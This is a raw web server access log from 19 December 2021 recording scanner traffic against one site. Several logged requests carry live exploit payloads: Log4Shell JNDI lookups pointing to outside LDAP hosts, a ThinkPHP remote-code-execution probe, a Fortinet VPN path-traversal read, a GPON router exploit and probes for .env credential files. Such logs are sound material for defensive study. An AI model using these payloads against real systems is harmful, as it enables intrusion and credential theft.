[19/Dec/2021:01:32:32 +0100] 35.89.28.98 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[19/Dec/2021:01:40:37 +0100] 34.222.249.100 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[19/Dec/2021:01:50:16 +0100] 185.220.101.133 TLSv1.2 AES256-SHA "GET /?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D HTTP/1.1" 374
[19/Dec/2021:02:57:47 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "POST /_ignition/execute-solution HTTP/1.1" 319
[19/Dec/2021:02:57:52 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[19/Dec/2021:02:57:56 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET /script HTTP/1.1" 305
[19/Dec/2021:02:58:07 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET /login HTTP/1.1" 305
[19/Dec/2021:02:58:10 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET /jenkins/login HTTP/1.1" 312
[19/Dec/2021:02:58:13 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET /manager/html HTTP/1.1" 308
[19/Dec/2021:02:58:18 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET /wp-login.php HTTP/1.1" 311
[19/Dec/2021:02:58:21 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=vbjmzb15 HTTP/1.1" 385
[19/Dec/2021:02:58:24 +0100] 8.134.210.94 TLSv1.2 AES256-SHA "GET /users/sign_in HTTP/1.1" 311
[19/Dec/2021:04:05:35 +0100] 109.237.103.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[19/Dec/2021:04:05:36 +0100] 109.237.103.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[19/Dec/2021:04:21:53 +0100] 128.1.248.26 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[19/Dec/2021:04:58:32 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[19/Dec/2021:05:48:14 +0100] 131.180.121.205 - - "-" -
[19/Dec/2021:06:01:38 +0100] 45.67.14.27 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /GponForm/diag_Form?style/ HTTP/1.1" 406
[19/Dec/2021:06:05:52 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[19/Dec/2021:07:05:53 +0100] 192.241.212.249 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[19/Dec/2021:07:29:07 +0100] 64.62.197.2 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[19/Dec/2021:07:30:56 +0100] 51.158.156.78 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /hmc/hybris HTTP/1.1" 393
[19/Dec/2021:07:47:55 +0100] 142.93.100.250 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[19/Dec/2021:08:59:26 +0100] 192.241.214.65 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[19/Dec/2021:09:07:50 +0100] 192.241.212.100 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[19/Dec/2021:09:43:50 +0100] 193.118.53.194 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[19/Dec/2021:11:59:55 +0100] 35.195.93.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[19/Dec/2021:12:10:46 +0100] 192.241.207.72 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[19/Dec/2021:12:13:13 +0100] 192.241.212.246 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[19/Dec/2021:12:14:09 +0100] 192.241.212.10 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[19/Dec/2021:13:32:21 +0100] 43.131.94.145 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 379
[19/Dec/2021:13:32:27 +0100] 209.141.33.65 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[19/Dec/2021:13:32:30 +0100] 209.141.36.231 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[19/Dec/2021:13:32:37 +0100] 205.185.116.89 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309
[19/Dec/2021:13:34:24 +0100] 173.249.5.201 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 452
[19/Dec/2021:14:23:08 +0100] 192.241.207.185 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[19/Dec/2021:16:06:37 +0100] 173.212.209.24 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 300
[19/Dec/2021:18:03:49 +0100] 8.218.91.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[19/Dec/2021:18:03:55 +0100] 8.218.91.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /text4041639933435 HTTP/1.1" 400
[19/Dec/2021:18:03:56 +0100] 8.218.91.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /HNAP1 HTTP/1.1" 388
[19/Dec/2021:18:03:57 +0100] 8.218.91.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /sdk HTTP/1.1" 386
[19/Dec/2021:18:03:57 +0100] 8.218.91.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /evox/about HTTP/1.1" 393
[19/Dec/2021:18:03:57 +0100] 8.218.91.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[19/Dec/2021:18:03:58 +0100] 8.218.91.79 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[19/Dec/2021:18:04:19 +0100] 8.218.91.79 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[19/Dec/2021:18:04:22 +0100] 8.218.91.79 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 308
[19/Dec/2021:19:26:58 +0100] 131.180.121.205 - - "-" -
[19/Dec/2021:19:43:09 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[19/Dec/2021:19:53:41 +0100] 106.75.169.79 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 383
[19/Dec/2021:19:56:07 +0100] 162.221.192.26 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[19/Dec/2021:22:34:29 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 428
[19/Dec/2021:22:34:30 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[19/Dec/2021:22:34:30 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?v=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 431
[19/Dec/2021:22:34:31 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?id=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 432
[19/Dec/2021:22:34:32 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?page=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 434
[19/Dec/2021:22:34:32 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?s=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 431
[19/Dec/2021:22:34:33 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /login HTTP/1.1" 388
[19/Dec/2021:22:34:34 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[19/Dec/2021:22:34:34 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[19/Dec/2021:22:34:35 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[19/Dec/2021:22:34:36 +0100] 211.154.194.21 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[19/Dec/2021:22:38:01 +0100] 128.14.209.162 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /owa/ HTTP/1.1" 304